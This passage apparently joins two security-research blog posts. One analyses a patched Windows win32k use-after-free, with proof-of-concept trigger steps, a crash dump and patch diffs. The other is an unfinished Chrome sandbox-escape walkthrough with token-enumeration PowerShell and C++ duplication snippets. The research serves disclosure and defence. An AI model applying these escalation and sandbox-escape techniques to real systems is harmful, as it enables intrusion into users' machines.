            HMAssignmentLock(&gspwndActivate, v48);
            if ( !*(_QWORD *)&gspwndActivate )
                xxxCancelCoolSwitch();
            return;
        }
    } else { v43 = handleOfNextWindowToHilite; }
    tagWndPtrOfNextWindow = HMValidateHandleNoSecure(handleOfNextWindowToHilite, TYPE_WINDOW);
    if ( tagWndPtrOfNextWindow )
        goto LABEL_103;
    isShiftPressed2 = isShiftPressed;
}

[...]

LABEL_106:
  v11 = queue->spwndActive;   USE AFTER FREE
  if ( v11 || (v11 = queue->ptiKeyboard->rpdesk->pDeskInfo->spwnd->spwndChild) != 0i64 ) {

[...]

USER-MODE CALLBACK in xxxMoveSwitchWndHilite

There are quite a few different user-mode callbacks within xxxMoveSwitchWndHilite. Many of these could work, but the difficulty is picking one that will reliably return to our POC code. I chose the call to xxxSendMessageTimeout in DrawSwitchWndHilite.

This call is sending the message to the window that is being highlighted in the task switch window by xxxMoveSwitchWndHilite. Therefore, if we create windows in our POC, we can ensure that our POC will receive this callback.

xxxMoveSwitchWndHilite sends message 0x8C, which is WM_LPKDRAWSWITCHWND. This is an undocumented message and thus it’s not expected that user applications will respond to it. Instead, there is a user-mode function that is automatically dispatched by ntdll!KiUserCallbackDispatcher. The user-mode callback for this message is user32!_fnINLPKDRAWSWITCHWND. In order to execute code during this callback, the POC hot-patches the PEB.KernelCallbackTable, using the methodology documented here.

In the callback, we free the tagQ structure using AttachThreadInput. AttachThreadInput “attaches the input processing mechanism of one thread to that of another thread” and to do this, it destroys the queue of the thread that is being attached to another thread’s input. The two threads then share a single queue. In the callback, we also have to perform the following operations to force execution down the code path that will use the now freed queue:
  1. xxxMoveSwitchWndHilite returns the handle of the next window it should highlight. When this handle is passed to HMValidateHandleNoSecure, it needs to return 0. Therefore, in the callback we need to destroy the window that is going to be highlighted. When HMValidateHandleNoSecure returns 0, we’ll loop back to the top of the while loop.
  2. Once we’re back at the top of the while loop, in the following code block we need to set v45 to 0. There appear to be two options: fail the check such that you go in the else block or set the extra data in the tagWND struct to 0 using SetWindowLongPtr. The SetWindowLongPtr method doesn’t work because this window is a special system class (fnid == 0x2A0). Therefore, we must fail one of the checks and end up in the else block in order to be in the code path that will allow us to use the freed queue.

if (gspwndAltTab->fnid & 0x3FFF == 0x2A0 && 
     gspwndAltTab->cbwndExtra + 0x128 == gpsi->mpFnid_serverCBWndProc[6] && 
     gspwndAltTab->bDestroyed == 0 )
    v45 = *(switchWndStruct **)(gspwndAltTab + 0x128);
else
    v45 = 0i64;

USING THE FREED QUEUE

Once v45 is set to 0, the thread is unlocked and execution proceeds to LABEL_106 (xxxNextWindow + 0x847) where mov r14, [rbp+50h] is executed. rbp is the tagQ pointer so we dereference it and move it into r14. Therefore we now have a use-after-free.

WINDOWS 10 

CVE-2019-1433 also affected Windows 10 builds. I did not analyze any Windows 10 builds besides 1903.

Vulnerable (Oct 2019) win32kfull.sys: c2e7f733e69271019c9e6e02fdb2741c7be79636b92032cc452985cd369c5a2c (SHA-256)
Patched (Nov 2019) win32kfull.sys: 15c64411d506707d749aa870a8b845d9f833c5331dfad304da8828a827152a92 (SHA-256)

I confirmed that the vulnerability existed on Windows 10 1903 as of the Oct 2019 patch by triggering the use-after-free with Driver Verifier enabled on win32kfull.sys. Below are excerpts from the crash.

*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.

FAULTING_IP: 
win32kfull!xxxNextWindow+743
ffff89ba`965f553b 4d8bbd80000000  mov r15,qword ptr [r13+80h]

 # Child-SP          RetAddr Call Site
00 ffffa003`81fe5f28 fffff806`800aa422 nt!DbgBreakPointWithStatus
01 ffffa003`81fe5f30 fffff806`800a9b12 nt!KiBugCheckDebugBreak+0x12
02 ffffa003`81fe5f90 fffff806`7ffc2327 nt!KeBugCheck2+0x952
03 ffffa003`81fe6690 fffff806`7ffe4663 nt!KeBugCheckEx+0x107
04 ffffa003`81fe66d0 fffff806`7fe73edf nt!MiSystemFault+0x1d6933
05 ffffa003`81fe67d0 fffff806`7ffd0320 nt!MmAccessFault+0x34f
06 ffffa003`81fe6970 ffff89ba`965f553b nt!KiPageFault+0x360    
07 ffffa003`81fe6b00 ffff89ba`965aeb35 win32kfull!xxxNextWindow+0x743 ← UAF
08 ffffa003`81fe6d30 ffff89ba`96b9939f win32kfull!EditionHandleAndPostKeyEvent+0xab005
09 ffffa003`81fe6e10 ffff89ba`96b98c35 win32kbase!ApiSetEditionHandleAndPostKeyEvent+0x15b
0a ffffa003`81fe6ec0 ffff89ba`96baada5 win32kbase!xxxUpdateGlobalsAndSendKeyEvent+0x2d5
0b ffffa003`81fe7000 ffff89ba`96baa7fb win32kbase!xxxKeyEventEx+0x3a5
0c ffffa003`81fe71d0 ffff89ba`964e3f44 win32kbase!xxxProcessKeyEvent+0x1ab
0d ffffa003`81fe7250 ffff89ba`964e339b win32kfull!xxxInternalKeyEventDirect+0x1e4
0e ffffa003`81fe7320 ffff89ba`964e2ccd win32kfull!xxxSendInput+0xc3
0f ffffa003`81fe7390 fffff806`7ffd3b15 win32kfull!NtUserSendInput+0x16d
10 ffffa003`81fe7440 00007ffb`7d0b2084 nt!KiSystemServiceCopyEnd+0x25
11 0000002b`2a5ffba8 00007ff6`a4da1335 win32u!NtUserSendInput+0x14
12 0000002b`2a5ffbb0 00007ffb`7f487bd4 WizardOpium+0x1335 <- My POC
13 0000002b`2a5ffc10 00007ffb`7f86ced1 KERNEL32!BaseThreadInitThunk+0x14
14 0000002b`2a5ffc40 00000000`00000000 ntdll!RtlUserThreadStart+0x21

BUILD_VERSION_STRING:  18362.1.amd64fre.19h1_release.190318-1202

To trigger the crash, I only had to change two things in the Windows 7 POC:
  1. The keystrokes are different to trigger the xxxNextWindow task switch window on Windows 10. I was able to trigger it by smashing CTRL+ALT+TAB while the POC was running (and triggering the normal task switch window). It is possible to do this programmatically; I just didn’t take the time to code it up.
  2. Overwrite index 0x61 instead of 0x57 in the KernelCallbackTable.

It took me about 3 hours to get the POC to trigger Driver Verifier on Windows 10 1903 regularly (about every 3rd time it's run). 
Disassembly at xxxNextWindow+737 in Oct 2019 Update
Disassembly at xxxNextWindow+73F in Nov 2019 Update

The fix in the November update for Windows 10 1903 is the same as the Windows 7 fix: 
  • Add the UnlockQueue function.
  • Add locking around the call to xxxNextWindow.
  • Check the “destroyed” bitflag in the tagQ struct before proceeding to use the queue. 

FIXING THE VULNERABILITY

To patch the CVE-2019-1433 vulnerability, Microsoft changed four functions:
  • xxxNextWindow
  • xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10)
  • zzzDestroyQueue
  • UnlockQueue (new function)

Overall, the changes are to prevent the queue structure from being freed and track if something attempted to destroy the queue. The addition of the new function, UnlockQueue, suggests that there were no previous locking mechanisms for queue objects. 

zzzDestroyQueue Patch

The only change to the zzzDestroyQueue function in win32k is that if the refcount on the tagQ structure (tagQ.cLockCount) is greater than 0 (keeping the queue from being freed immediately), then the function now sets a bit in tagQ.QF_flags.




zzzDestroyQueue Pre-Patch



zzzDestroyQueue Post-Patch
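
Rough pseudocode of the patched zzzDestroyQueue behavior described above; field names follow the post (cLockCount, QF_flags) and the flag bit is the one xxxNextWindow tests after the patch, not the actual source:

// Sketch only: defer the free while the queue is thread-locked, but record
// that a destroy was requested so later users of the queue can bail out.
struct tagQ {
  unsigned int cLockCount;  // thread-lock refcount
  unsigned int QF_flags;    // queue flags
  // ...
};

void zzzDestroyQueue(tagQ* queue) {
  if (queue->cLockCount > 0) {
    queue->QF_flags |= (1u << 0x1A);  // remember the pending destroy
    return;                           // free is deferred, as before the patch
  }
  // ... otherwise tear down and free the queue as before ...
}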

xxxNextWindow Patch

There is a single change to the xxxNextWindow function as shown by the BinDiff graph below. When execution is about to use the queue again (at what was LABEL_106 in the vulnerable version), a check has been added to see if a bitflag in tagQ.QF_flags is set. The instructions added to xxxNextWindow+0x847 are as follows, where rbp is the pointer to the tagQ structure.

bt      dword ptr [rbp+13Ch], 1Ah
jb      loc_FFFFF9600017A0C9

If the bit is set, the function exits. If the bit is not set, the function continues and will use the queue. The only place this bit is set is in zzzDestroyQueue. The bit is set when the queue was destroyed but couldn’t be freed immediately because its refcount (tagQ.cLockCount) was greater than 0. Setting the bit is a new change to the code base, as described in the section above.
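
In C terms, the added check is roughly equivalent to the following (my translation of the two instructions above; QF_flags is the 32-bit field at offset 0x13C of tagQ):

// Rough C equivalent of the bt/jb pair: bail out before using the queue if
// the bit set by zzzDestroyQueue (bit 0x1A of tagQ.QF_flags) is set.
if (queue->QF_flags & (1u << 0x1A))
    return;  // queue was destroyed during a callback; don't touch it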


xxxKeyEvent (Windows 7)/EditionHandleAndPostKeyEvent (Windows 10) Patch

In this section I will simply refer to the function as xxxKeyEvent since Windows 7 was the main platform analyzed. However, the changes are also found in the EditionHandleAndPostKeyEvent function in Windows 10. 

The change to xxxKeyEvent is to thread lock the queue that is passed as the first argument to xxxNextWindow. Thread locking doesn’t appear to be publicly documented by Microsoft. My understanding comes from Tarjei Mandt’s 2011 Blackhat USA presentation, “Kernel Attacks through User-Mode Callbacks”. Thread locking is where objects are added to a thread’s lock list, and their ref counter is increased in the process. This prevents them from being freed while they are still locked to the thread. 

The new function, UnlockQueue, is used to unlock the queue. 

if ( !queue )
    queue = gptiRit->pq;
xxxNextWindow(queue, vkey_cp);
xxxKeyEvent+92E Pre-Patch

if ( !queue )
    queue = gptiRit->pq;
++queue->cLockCount;
currWin32Thread = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v62);
threadLockW32 = currWin32Thread->ptlW32;
currWin32Thread->ptlW32 = (_TL *)&threadLockW32;
queueCp = queue;
unlockQueueFnPtr = (void (__fastcall *)(tagQ *))UnlockQueue;
xxxNextWindow(queue, vkey_cp);
currWin32Thread2 = (tagTHREADINFO *)PsGetCurrentThreadWin32Thread(v64);
currWin32Thread2->ptlW32 = threadLockW32;
unlockQueueFnPtr(queueCp);
xxxKeyEvent+94E Post-Patch

CONCLUSION

So...I got it wrong. Based on the details provided by Kaspersky in their blog post, I attempted to patch diff the vulnerability in order to do a root cause analysis. It was only based on the feedback from Microsoft (Thanks, Microsoft!) and their guidance to look at the InitFunctionTables method that I realized I had analyzed a different bug. I analyzed CVE-2019-1433 rather than CVE-2019-1458, the vulnerability exploited in the wild. The real root cause analysis for CVE-2019-1458 was documented by @florek_pl here.

If I had patch-diffed November 2019 to December 2019 rather than September to December, then I wouldn’t have analyzed the wrong bug. This seems obvious after the fact, but when just starting out, I thought that maybe Windows 7, being so close to end of life, didn’t get updates every single month. Now I know to not only rely on Windows Update, but also to look for KB articles and that I can download additional updates from the Microsoft Update Catalog.

Although this blog post didn’t turn out how I originally planned, I decided to share it in the hopes that it’d encourage others to explore a platform new to them. It’s often not a straight path, but if you’re interested in Windows kernel research, this is how I got started. In addition, I think this was a fun and quite interesting bug!

I didn’t initially set out to do a patch diffing exercise on this vulnerability, but I do think that this work gives us another data point to use in disclosure discussions. It took me, someone with reversing, but no Windows experience, three weeks to understand the vulnerability and write a proof-of-concept. While I ended up doing this analysis for a vulnerability other than the one I intended, many attackers are not looking to patch-diff a specific vulnerability, but rather any vulnerability that they could potentially exploit. Therefore, I think that three weeks can be used as an approximate high upper bound since most attackers looking to use this technique will have more experience.

You Won't Believe what this One Line Change Did to the Chrome Sandbox

21 April 2020 at 18:25

Posted by James Forshaw, Project Zero


The Chromium sandbox on Windows has stood the test of time. It’s considered one of the better sandboxing mechanisms deployed at scale without requiring elevated privileges to function. For all the good, it does have its weaknesses. The main one being the sandbox’s implementation is reliant on the security of the Windows OS. Changing the behavior of Windows is out of the control of the Chromium development team. If a bug is found in the security enforcement mechanisms of Windows then the sandbox can break.

This blog is about a vulnerability introduced in Windows 10 1903 which broke some of the security assumptions that Chromium relied on to make the sandbox secure. I’ll present how I used the bug to develop a chain of execution to escape the sandbox as used for the GPU Process on Chrome/Edge or the default content sandbox in Firefox. The exploitation process is also an interesting insight into the little weaknesses in Windows which in themselves do not cross a security boundary but led to a successful sandbox escape. This vulnerability was fixed in April 2020 as CVE-2020-0981.

Background to the Issue

Let’s have a quick look at how the Chromium sandbox works on Windows before describing the bug itself. The sandbox works on the concept of least privilege by using Restricted Tokens. A Restricted Token is a feature added in Windows 2000 to reduce the access granted to a process by modifying the process’s Access Token with the following operations:
  • Permanently disabling Groups.
  • Removing Privileges.
  • Adding Restricted SIDs.

Disabling groups removes the Access Token’s membership in those groups, disabling access to resources secured by them. Removing privileges prevents the process from performing any unnecessary privileged operations. Finally, adding restricted SIDs changes the security access check process: to be granted access to a resource, a security descriptor entry must match both a group in our main list and an entry in the list of Restricted SIDs. If either list does not grant access to the resource then access will be denied.
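
For reference, here is a minimal, hedged sketch of those operations using the documented CreateRestrictedToken API; this is illustrative only, not Chromium’s actual sandbox code, and error handling is mostly omitted:

// Creates a restricted copy of process_token: privileges stripped via
// DISABLE_MAX_PRIVILEGE and a single restricting SID added. A real sandbox
// would also disable groups and pick the restricting SIDs carefully.
#include <windows.h>

HANDLE CreateSandboxToken(HANDLE process_token, PSID restricting_sid) {
  SID_AND_ATTRIBUTES restricted[1] = {};
  restricted[0].Sid = restricting_sid;

  HANDLE new_token = nullptr;
  if (!CreateRestrictedToken(process_token,
                             DISABLE_MAX_PRIVILEGE,  // remove privileges
                             0, nullptr,             // groups to disable (none here)
                             0, nullptr,             // privileges to delete
                             1, restricted,          // restricting SIDs
                             &new_token)) {
    return nullptr;
  }
  // The Integrity Level would then be lowered separately, e.g. with
  // SetTokenInformation(new_token, TokenIntegrityLevel, ...).
  return new_token;
}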

Chromium also uses the Integrity Level (IL) feature added in Vista to further restrict resource access. By setting a low IL we can block write access to higher integrity resources regardless of the result of the access check.

Using Restricted Tokens with IL in this way allows the sandbox to limit what resources a compromised process can access and therefore the impact an RCE can have. It’s especially important to block write access as that would typically grant an attacker leverage to compromise other parts of the system by writing files or registry keys.

Any process on Windows can create a new process with a different Token, for example by calling CreateProcessAsUser. What stops a sandboxed process from creating a new process using an unrestricted token? Windows and Chromium implement a few security mitigations to make creating a new process outside of the sandbox difficult:
  1. The Kernel restricts what Tokens can be assigned by an unprivileged user to a new process.
  2. The sandbox restrictions limit the availability of suitable access tokens to use for the new process.
  3. Chromium runs a sandboxed process inside a Job object, which is inherited by any child processes and which has a hard process quota limit of 1.
  4. From Windows 10, Chromium uses the Child Process Mitigation Policy to block child process creation. This is applied in addition to the Job object from 3.

All of these mitigations are ultimately relying on Windows to be secure. However, by far the most critical is 1. Even if 2 through 4 fail, in theory we shouldn’t be able to assign a more privileged access token to the new process. What is the kernel checking when it comes to assigning a new token?

Assuming the calling process doesn’t have SeAssignPrimaryTokenPrivilege (which we don’t), the new token must meet one of two criteria, which are checked in the kernel function SeIsTokenAssignableToProcess. The criteria are based on specific values in the kernel’s TOKEN object structure, as shown in the following diagram.

Parent/Child and Sibling Process Token Assignment Relationships


In summary the token must either be:
  1. A child of the current process token. Based on the new token’s Parent Token ID being equal to the Process Token’s ID.
  2. A sibling of the current process token. Based on both the Parent Token ID and Authentication ID fields being equal.

There are also additional checks to ensure that the new Token is not an identification-level impersonation token (due to this bug I reported) and that the IL of the new token is less than or equal to the current process token’s. These are equally important but, as we’ll see, less useful in practice.
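
A simplified sketch of the two criteria follows; field names mirror the description above and the IDs are modeled as plain integers rather than the kernel’s LUIDs, so this is not the actual SeIsTokenAssignableToProcess source:

// Sketch of the parent/child and sibling assignment checks described above.
#include <cstdint>

struct Token {
  uint64_t TokenId;
  uint64_t ParentTokenId;
  uint64_t AuthenticationId;
};

bool IsTokenAssignable(const Token& NewToken, const Token& ProcessToken) {
  // Child: the new token was derived from the process token.
  if (NewToken.ParentTokenId == ProcessToken.TokenId)
    return true;
  // Sibling: same parent token and same logon (authentication) session.
  return NewToken.ParentTokenId == ProcessToken.ParentTokenId &&
         NewToken.AuthenticationId == ProcessToken.AuthenticationId;
}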

One thing the token assignment does not obviously check is whether the Parent or Child tokens are restricted. If you were in a restricted token sandbox, could you get an Unrestricted Token which passes all of the checks and assign it to a child process, effectively escaping the sandbox? No, you can’t: the system ensures the Sibling Token check fails when assigning Restricted Tokens and instead ensures the Parent/Child check is the one which will be enforced. If you inspect the kernel function SepFilterToken, you’ll understand how this is implemented. The following code is executed when copying the existing properties from the parent token to the new restricted token.

NewToken->ParentTokenId = OldToken->TokenId;

By setting the new Restricted Token’s Parent Token ID, the kernel ensures that only the process which created the Restricted Token can use it for a child, as the Token ID is unique for every instance of a TOKEN object. At the same time, changing the Parent Token ID breaks the sibling check.

However, when I was doing some testing to verify the token assignment behavior on Windows 10 1909 I noticed something odd. No matter what Restricted Token I created I couldn’t get the assignment to fail. Looking at SepFilterToken again I found the code had changed.

NewToken->ParentTokenId = OldToken->ParentTokenId;

The kernel code was now just copying the Parent Token ID directly across from the old token. This completely breaks the check, as the new sandboxed process has a token which is considered a sibling of any other token on the desktop.

This one line change could just be sufficient to break out of the Restricted Token sandbox, assuming I could bypass the other 3 child process mitigations already in place. Let’s go through the trials and tribulations undertaken to do just that.

Escaping the Sandbox

The final sandbox escape I came up with is quite complicated, and it’s not necessarily the optimal approach. However, the complexity of Windows means it can be difficult to find alternative primitives to exploit in our chain.

Let’s start with trying to get a suitable access token to assign to a new process. The token needs to meet some criteria:
  1. The Token is a Primary token or convertible to a Primary Token.
  2. The Token has an IL equal to the sandbox IL, or is writable so that the IL level can be reduced.
  3. The Token meets the sibling token criteria so that it can be assigned.
  4. The Token is for the current Console Session.
  5. The Token is not sandboxed or is less sandboxed than the current token.

Access Tokens are securable objects, therefore if you have sufficient access you can open a handle to a Token. However, Access Tokens are not referred to by name; instead, to open a Token you need access to either a Process or an impersonating Thread. We can use my NtObjectManager PowerShell module to find accessible tokens using the Get-AccessibleToken command.

PS> $ps = Get-NtProcess -Name "chrome.exe" `
                  -FilterScript { $_.IsSandboxToken } `
                  -IgnoreDeadProcess
PS> $ts = Get-AccessibleToken -Processes $ps -CurrentSession `
                              -AccessRights Duplicate
PS> $ts.Count
101

This script gets a handle to every sandboxed Chrome process running on my machine (obviously start Chrome first), then uses the access token from each process to determine what other tokens we can open for TOKEN_DUPLICATE access. The reason for checking for TOKEN_DUPLICATE access is that we need to make a copy of the token to use in a new process, as two processes can’t share the same access token object. The access check takes into account whether the calling process would have PROCESS_QUERY_LIMITED_INFORMATION access to the target process, which is a prerequisite for opening the Token. We’ve got a fair number of results, over 100 entries.

However, this number is deceiving. For a start, some of the Tokens we can access will almost certainly be more sandboxed than the current token; really we want only accessible tokens which are unsandboxed. Secondly, while there are a lot of accessible tokens, that's likely an artifact of a small number of processes being able to access a large number of tokens. We’ll filter it down to just the command lines of the Chrome processes which can access non-sandboxed tokens.

PS> $ts | ? Sandbox -ne $true | `
    Sort {$_.TokenInfo.ProcessCommandLine} -Unique | `
    Select {$_.TokenInfo.ProcessId},{$_.TokenInfo.ProcessCommandLine}

ProcessId ProcessCommandLine
--------- ----------------------------------
     6840 chrome.exe --type=gpu-process ...
    13920 chrome.exe --type=utility --service-sandbox-type=audio ...

Out of all the potential Chrome processes only the GPU process and the Audio utility process have access to non-sandboxed tokens. This shouldn’t come as a massive surprise. The renderer processes are significantly more locked down than either the GPU or Audio sandboxes, which both need to call into system services to function. This does mean that the likelihood of going from RCE to sandbox escape is much reduced, as most RCEs occur in code rendering HTML/JS content. That said, GPU bugs do exist, for example this bug used by Lokihardt at Pwn2Own 2016.

Let’s focus on escaping the GPU process sandbox. As I don’t have a GPU RCE to hand I’ll just inject a DLL into the process to run the escape. That’s not as simple as it sounds: once the GPU process has started, it is locked down to only loading Microsoft signed DLLs. I use a trick with KnownDlls to load the DLL into memory (see this blog post for full details).

In order to escape the sandbox we need to do the following:
  1. Open an unrestricted token.
  2. Duplicate token to create a new Primary Token and make the token writable.
  3. Drop the IL of the token to match the current token (for GPU this is Low IL).
  4. Call CreateProcessAsUser with the new token.
  5. Escape Low IL sandbox.

Even for step 1 we’ve got a problem. The simplest way of getting an unrestricted token would be to open the token for the parent process, which is the main Chrome browser process. However, if you look through the list of tokens the GPU process can access you’ll find that the main Chrome browser process is not included. Why is that? This is intentional, as I realized after reporting this bug in the kernel that a GPU process sandbox could open the browser process’ token. With this token it’s possible to create a new restricted token which would pass the sibling check, allowing the creation of a new process with much more access and an escape from the sandbox. To mitigate this I modified the access on the process token to block lower IL processes from opening it for TOKEN_DUPLICATE access; see HardenTokenIntegrityLevelPolicy. Prior to this fix you didn’t need a bug in the kernel to escape the Chrome GPU sandbox, at least to a normal Low IL token.

Therefore the easy route is not available to us; however, we should be able to trivially enumerate processes and find one which meets our criteria. We can do this by using the NtGetNextProcess system call as I described in a previous blog post (on a topic we’ll come back to later). We open all processes for PROCESS_QUERY_LIMITED_INFORMATION access, then open the token for TOKEN_DUPLICATE and TOKEN_QUERY access. We can then inspect the token to ensure it’s unrestricted before proceeding to step 2.
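A rough sketch of this enumeration step is shown below. NtGetNextProcess is an undocumented system call, so its prototype is declared by hand (and resolved from ntdll); note that IsTokenRestricted only checks for restricted SIDs, so a real implementation would apply the fuller set of criteria listed earlier.

#include <windows.h>
#include <winternl.h>

// Undocumented ntdll syscall used to iterate over all processes we can open.
extern "C" NTSTATUS NTAPI NtGetNextProcess(HANDLE ProcessHandle,
                                           ACCESS_MASK DesiredAccess,
                                           ULONG HandleAttributes,
                                           ULONG Flags,
                                           PHANDLE NewProcessHandle);

// Walk every accessible process and return a TOKEN_DUPLICATE | TOKEN_QUERY
// handle to the first token which isn't restricted, or nullptr if none found.
HANDLE FindUnrestrictedToken() {
  HANDLE process = nullptr;
  HANDLE next = nullptr;
  while (NtGetNextProcess(process, PROCESS_QUERY_LIMITED_INFORMATION,
                          0, 0, &next) >= 0) {
    if (process) CloseHandle(process);
    process = next;
    HANDLE token = nullptr;
    if (OpenProcessToken(process, TOKEN_DUPLICATE | TOKEN_QUERY, &token)) {
      if (!IsTokenRestricted(token)) {
        CloseHandle(process);
        return token;  // Caller owns the handle.
      }
      CloseHandle(token);
    }
  }
  if (process) CloseHandle(process);
  return nullptr;
}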

To duplicate the token we call DuplicateTokenEx and request a primary token, passing TOKEN_ALL_ACCESS as the desired access. But there’s a new problem: when we try to lower the IL we get ERROR_ACCESS_DENIED from SetTokenInformation. This is due to a sandbox mitigation Microsoft added to Windows 10 and backported to all supported OSes (including Windows 7). The following code is a snippet from NtDuplicateToken where the mitigation has been introduced.

ObReferenceObjectByHandle(TokenHandle, TOKEN_DUPLICATE, 
    SeTokenObjectType, &Token, &Info);
DWORD RealDesiredAccess = 0;
if (DesiredAccess) {
    SeCaptureSubjectContext(&Subject);
    // The mitigation only applies if the caller is sandboxed.
    if (RtlIsSandboxedToken(Subject.PrimaryToken) 
     && RtlIsSandboxedToken(Subject.ClientToken)) {
        BOOLEAN IsRestricted;
        SepNewTokenAsRestrictedAsProcessToken(Token,
            Subject.PrimaryToken, &IsRestricted);
        // Grant the full desired access only if the token being duplicated
        // is the caller's own token or is at least as restricted as it.
        if (Token == Subject.PrimaryToken || IsRestricted)
            RealDesiredAccess = DesiredAccess;
        else
            RealDesiredAccess = DesiredAccess 
                & (Info.GrantedAccess | TOKEN_READ | TOKEN_EXECUTE);
    } else {
        RealDesiredAccess = DesiredAccess;
    }
} else {
    // No explicit desired access requested, fall back to the handle's
    // existing granted access.
    RealDesiredAccess = Info.GrantedAccess;
}

SepDuplicateToken(Token, &DuplicatedToken, ...);
ObInsertObject(DuplicatedToken, RealDesiredAccess, &Handle);

When you duplicate a token the kernel checks if the caller is sandboxed. If sandboxed the kernel then checks if the token to be duplicated is less restricted than the caller. If it’s less restricted then the code limits the desired access to TOKEN_READ and TOKEN_EXECUTE. This means that if we request a write access such as TOKEN_ADJUST_DEFAULT it’ll be removed on the handle returned to us from the duplication call. In turn this will prevent us reducing the IL so that it can be assigned to a new process.

This would seem to end our exploit chain. If we can’t write to the token, we can’t reduce the token’s IL, which prevents us from assigning it. But the implementation has a tiny flaw: the duplicate operation still completes and returns a handle, just with limited access rights. When you create a new token object the default security grants the caller full access to the Token object. This means that once you get back a handle to the new Token you can call the normal DuplicateHandle API to convert it to a fully writable handle. It’s unclear if this was intentional or not, although it should be noted that the similar check in CreateRestrictedToken returns an error if the new token isn’t as restricted. Whatever the case we can abuse this misfeature to get a writable unrestricted token to assign to the new process with the correct IL.
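A sketch of this two-step duplication, assuming token is the unrestricted TOKEN_DUPLICATE handle found during enumeration (error handling omitted):

#include <windows.h>

// Turn a TOKEN_DUPLICATE handle to an unrestricted token into a fully
// writable primary token, despite the NtDuplicateToken mitigation.
HANDLE MakeWritablePrimaryToken(HANDLE token) {
  // Step 1: ask for everything. The mitigation silently strips the write
  // rights, but the call still succeeds and returns a read-only handle.
  HANDLE primary = nullptr;
  DuplicateTokenEx(token, TOKEN_ALL_ACCESS, nullptr, SecurityImpersonation,
                   TokenPrimary, &primary);

  // Step 2: the new token object's default security grants us full access,
  // so re-duplicating the *handle* gives back the write rights.
  HANDLE writable = nullptr;
  DuplicateHandle(GetCurrentProcess(), primary, GetCurrentProcess(), &writable,
                  TOKEN_ALL_ACCESS, FALSE, 0);
  CloseHandle(primary);
  return writable;
}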

Now that we can get an unrestricted token we can call CreateProcessAsUser to create our new process. But not so fast, as the GPU process is still running in a restrictive Job object which prevents creating new processes. I detailed how Job objects prevent new process creation in my “In-Console-Able” blog post almost 5 years ago. Can we not use the same bug in the Console Driver to escape the Job object? On Windows 8.1 you probably can (although I’ll admit I’ve not tested); however, on Windows 10 there are two things which prevent us from using it:
  1. Microsoft changed Job objects to support an auxiliary process counter. If you have SeTcbPrivilege you can pass a flag to NtCreateUserProcess to create a new process still inside the Job which doesn’t count towards the process count. This is used by the Console Driver to remove the requirement to escape the Job. As we don’t have SeTcbPrivilege in the sandbox we can’t use this feature.
  2. Microsoft added a new flag to Tokens which prevents them from being used for a new process. This flag is set by Chrome on all sandboxed processes to restrict new child processes. Even without ‘1’ the flag would block abusing the Console Driver to spawn a new process.

The combination of these two features blocks spawning a new process outside of the current Job by abusing the Console Driver. We need to come up with another way of both escaping the Job object restriction and circumventing the child process restriction flag.
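For reference, one documented way of applying this kind of child process restriction when launching a process looks roughly like the following sketch. This is not Chromium's actual code, just an illustration of the mitigation we now have to work around.

#include <windows.h>
#include <cstdlib>

// Launch a child process with the child process creation policy set to
// restricted, so the child itself cannot spawn further processes.
bool LaunchWithChildProcessRestriction(wchar_t* cmdline) {
  DWORD policy = PROCESS_CREATION_CHILD_PROCESS_RESTRICTED;

  SIZE_T size = 0;
  InitializeProcThreadAttributeList(nullptr, 1, 0, &size);
  auto attrs = static_cast<LPPROC_THREAD_ATTRIBUTE_LIST>(malloc(size));
  InitializeProcThreadAttributeList(attrs, 1, 0, &size);
  UpdateProcThreadAttribute(attrs, 0,
                            PROC_THREAD_ATTRIBUTE_CHILD_PROCESS_POLICY,
                            &policy, sizeof(policy), nullptr, nullptr);

  STARTUPINFOEXW si = {};
  si.StartupInfo.cb = sizeof(si);
  si.lpAttributeList = attrs;
  PROCESS_INFORMATION pi = {};
  BOOL ok = CreateProcessW(nullptr, cmdline, nullptr, nullptr, FALSE,
                           EXTENDED_STARTUPINFO_PRESENT, nullptr, nullptr,
                           &si.StartupInfo, &pi);
  DeleteProcThreadAttributeList(attrs);
  free(attrs);
  if (ok) {
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
  }
  return ok;
}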

The Job object is inherited from parent to child, therefore if we could find a process outside of a Job object which the GPU process can control we can use that process as a new parent and escape the Job. Unfortunately, at least by default, if you check what processes the GPU process can access it can only open itself.

PS> Get-AccessibleProcess -ProcessIds 6804 -AccessRights GenericAll `
             | Select-Object ProcessId, Name
ProcessId Name
--------- ----
     6804 chrome.exe

Opening itself isn’t going to be very useful, and we can’t rely on getting lucky with a process which just happens to be running at the time and which is both accessible and not running in a Job. We need to make our own luck.

One thing I noticed is that there’s a small race condition setting up a new Chrome sandbox process. The process is first created, then the Job object is applied. If we could get the Chrome browser to spawn a new GPU process we could use it as a parent before the Job object is applied. The handling of the GPU process even supports respawning the process if it crashes. However, I couldn’t find a way of getting a new GPU process to spawn without also causing the current one to terminate, so it wasn’t possible to have code running long enough to exploit the race.

Instead I decided to concentrate on finding an RPC service which would create a new process outside of the Job. There are quite a few RPC services where process creation is the main goal, and others where process creation is a side effect. For example, I already documented the Secondary Logon service in a previous blog post, where the entire purpose of the RPC service is to spawn new processes.

There is a slight flaw in this idea though: the child process mitigation flag in the token is inherited across impersonation boundaries. As it’s common to use the impersonation token as the basis for the new process, any new process will be blocked. However, we have an unrestricted token that does not have the flag set. By using the unrestricted token to create a restricted token which we impersonate during an RPC call, we can bypass the child process mitigation flag.

I tried to list what known services could be used in this way, which I’ve put together in the following table:

Service                                         Is Accessible   Can Escape Job
-------                                         -------------   --------------
Secondary Logon Service                         No              No
WMI Win32_Process                               No              Yes
User Account Control (UAC)                      Yes             No
Background Intelligent Transfer Service (BITS)  No              Yes
DCOM Activator                                  Yes             Yes

The table is not exhaustive and there are likely to be other RPC services which would allow processes to be created. As we can see in the table, well known RPC services which spawn processes, such as Secondary Logon, WMI and BITS, are not accessible from our sandbox level. The UAC service is accessible and, as I described in a previous blog post, there exists a way of abusing the service to run arbitrary privileged code by abusing debug objects. Unfortunately, when a new UAC process is created the service sets the parent process to the caller process. As the Job object is inherited the new process will be blocked.

